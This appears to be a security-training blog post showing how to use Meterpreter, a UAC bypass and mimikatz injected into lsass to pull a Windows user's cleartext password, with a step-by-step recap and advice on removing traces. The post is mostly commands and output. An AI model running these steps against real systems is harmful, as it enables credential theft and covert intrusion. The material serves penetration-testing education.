Ever have that moment where hashes just aren’t good enough? Where you don’t have time or power to brute force a 15 character NTLM password? Well, if you were able to dump hashes in the first place, then you’ve already achieved the necessary pre-requisites to dump the passwords in clear text. Yes… you read that correctly, clear text.

A few days ago I was catching up on my Google Reader feed and ran into this great post on pentestmonkey.net about a tool called mimikatz. … Great blog by the way. I highly recommend it. … It got me thinking, “This technique works great locally, but what would it take to get it working remotely via meterpreter?” And off I went to play.

First, the usual setup, remote meterpreter on a Windows 7 box.

root@EyeHakUNow:~# msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.15 E
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.15
[*] Started reverse handler on 192.168.1.15:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.14:51968) at 2012-02-15 20:42:15 -0500

The first thing I tried was using the meterpreter ‘execute’ command to launch the local mimikatz binary in memory on the remote host. Unfortunately, mimikatz relies on external files to function, so this failed. A quick fail, but we still have options. One being old fashion upload and execute. I uploaded the mimikatz binary and necessary dependencies using the meterpreter ‘upload’ command…

meterpreter > cd \
meterpreter > mkdir temp
Creating directory: temp
meterpreter > cd temp
meterpreter > upload /root/tools/mimikatz/x64/mimikatz.exe .
[*] uploading  : /root/tools/mimikatz/x64/mimikatz.exe -> .
[*] uploaded   : /root/tools/mimikatz/x64/mimikatz.exe -> .\mimikatz.exe
meterpreter > upload /root/tools/mimikatz/x64/sekurlsa.dll .
[*] uploading  : /root/tools/mimikatz/x64/sekurlsa.dll -> .
[*] uploaded   : /root/tools/mimikatz/x64/sekurlsa.dll -> .\sekurlsa.dll
meterpreter > ls
Listing: C:\temp
================
Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-15 20:43:11 -0500  .
40777/rwxrwxrwx   0       dir   1980-01-01 00:00:00 -0500  ..
100777/rwxrwxrwx  657392  fil   2012-02-15 20:43:03 -0500  mimikatz.exe
100666/rw-rw-rw-  265200  fil   2012-02-15 20:43:12 -0500  sekurlsa.dll

…dropped to a shell, and executed mimikatz. I was able to access the mimikatz console, but when I tried to inject into the lsass process, I received what appeared to be a permissions error. It was hard to tell since all application output and documentation is written in French. More on this later. One of two things was stopping me: either I didn’t have enough privileges, or UAC was getting in the way. I began working my way through the problem using trial and error. The first thing I tried was to get system level privileges.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Okay… plan ‘B’. UAC must be the issue. I ran the ‘bypassuac’ post module.

meterpreter > run post/windows/escalate/bypassuac
[*] Started reverse handler on 192.168.1.15:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 2 opened (192.168.1.15:4444 -> 192.168.1.14:51969) at 2012-02-15 20:43:41 -0500
[*] Session ID 2 (192.168.1.15:4444 -> 192.168.1.14:51969) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: pMTllsDttene.exe (2308)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1128
[+] Successfully migrated to process

Awesome, UAC bypassed. I jumped into the new session, dropped to a shell, loaded up the mimikatz console, and attempted the injection again.

meterpreter > background
msf  exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > cd \
meterpreter > cd temp
meterpreter > shell
Process 2444 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\temp>mimikatz
mimikatz
mimikatz 1.0 x64 (alpha)	/* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 512
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id         : 0;129433
Package d'authentification  : NTLM
Utilisateur principal       : LaNMaSteR
Domaine d'authentification  : WIN-8GLMSQD3GDE
msv1_0 : 	lm{ 00000000000000000000000000000000 }, ntlm{ d6ca08f8c9f57f208b4f746c3cf0d667 }
wdigest : 	reallygoodpassword
tspkg : 	reallygoodpassword
...
mimikatz #

Holy crap! Is that a password in clear text? Yes… it is. In all its glory. Now you can do all of those great things you couldn’t do with pass-the-hash… which isn’t much. But it’s just nice to see the password in clear text isn’t it? I thought so.

To rehash:
1. Get shell.
2. Bypass UAC.
3. Upload binary and dependencies.
4. Enter mimikatz console.
5. Inject into lsass and pull creds.
6. Exit mimikatz console.
7. Clean up files and processes (details below).

Some things to consider...

1. Wdigest seems to be the main culprit here. Windows is storing the password to use for wdigest authentication. Interesting to think what else may be exploitable here. There very well may be a way to turn this off in the registry or security policy, but I have not explored it to that level yet. More to come perhaps.

2. All of the documentation, and standard/error output of program itself, is in French. I used Google Translate to read the documentation on the site, which was pretty garbled, but worked enough to make sense of the important details. In the comments on one of the author's blog entries, someone asked where the English version was and mentioned that the tool would get more attention if there was an English version. The author replied with something along the lines of, "What makes you think I want more attention?" Hopefully he doesn't mind the world's largest security blog writing about it...

3. Don't forget to clean up after yourself. If you're uploading and executing, your placing files on the remote filesystem. Make sure you delete them before you leave. Also, the 'bypassuac' post module makes a mess of processes on the remote system. You may want to clean those up before leaving too. The above steps consistently leave the following 8 new process running in addition to the existing ones. 3 of them have randomly generated names. It's obvious which ones.

evil.exe
JMjFkkeww.exe
conhost.exe
tior.exe
conhost.exe
cmd.exe
edMTUOe.exe
notepad.exe

4. Mimikatz comes packaged with psexec and works quite well with it. The downside is, you need to have credentials to use psexec in the first place.

5. Wouldn't something like this make a great post module? Calling all Ruby devs!!!

As always, enjoy! And join me for the following events!
Boston, MA - SANS Security 542: Web App Penetration Testing and Ethical Hacking beginning May 7th.
Toledo, OH - SANS Security 560: Network Penetration Testing and Ethical Hacking beginning March 26th!
REGISTER TODAY FOR DISCOUNTS! Up to 50% on SEC560!

About the author